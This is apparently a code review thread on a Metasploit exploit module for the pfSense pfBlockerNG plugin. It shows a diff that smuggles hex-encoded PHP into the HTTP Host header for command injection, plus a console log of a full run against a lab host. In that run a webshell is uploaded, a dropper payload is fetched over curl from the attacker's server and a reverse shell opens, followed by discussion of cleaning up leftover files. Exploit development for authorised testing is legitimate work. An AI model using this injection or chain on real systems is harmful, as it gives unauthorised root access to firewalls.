modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb

```diff
@@ -106,15 +106,26 @@ def upload_shell
   end
 
   def check
-    upload_shell
-    check_resp = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
-      'vars_post' => {
-        @parameter_name.to_s => 'id'
+    test_file_name = Rex::Text.rand_text_alpha(4..12)
+    test_file_content = Rex::Text.rand_text_alpha(4..12)
+    test_injection = <<~EOF
+      <?php echo file_put_contents('/usr/local/www/#{test_file_name}','#{test_file_content}');
+    EOF
+    encoded_php = test_injection.unpack('H*')[0].upcase
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
       }
     )
-    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
+    sleep datastore['WfsDelay']
+    register_file_for_cleanup("/usr/local/www/#{test_file_name}")
```

Comment:
Check to see if running check _then_ run does this get cleaned up

Reply:
It does not unfortunately: 
```
msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > check

[!] This exploit may require manual cleanup of '/usr/local/www/wkfhMokufJG' on the target
[+] 172.16.199.130:80 - The target is vulnerable.
msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading shell...
[*] Webshell name is: FVgQsWztCO.php
[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
[*] Using URL: http://172.16.199.1:8080/VWa6bPf4rvTfsrt
[*] Client 172.16.199.130 (curl/7.76.1) requested /VWa6bPf4rvTfsrt
[*] Sending payload to 172.16.199.130 (curl/7.76.1)
[+] Deleted /usr/local/www/yWFxnhUYYHIq
[+] Deleted /usr/local/www/FVgQsWztCO.php
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.130:34066) at 2022-10-20 10:24:36 -0400
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
```
`/usr/local/www/wkfhMokufJG` still exists on the target

Reply:
I'm assuming we can use the same vulnerability to delete the file?

Reply:
Good call @bwatters-r7, I've added that functionality and tested to make sure the check method still works as intended and doesn't leave any files on disk when only the check is run.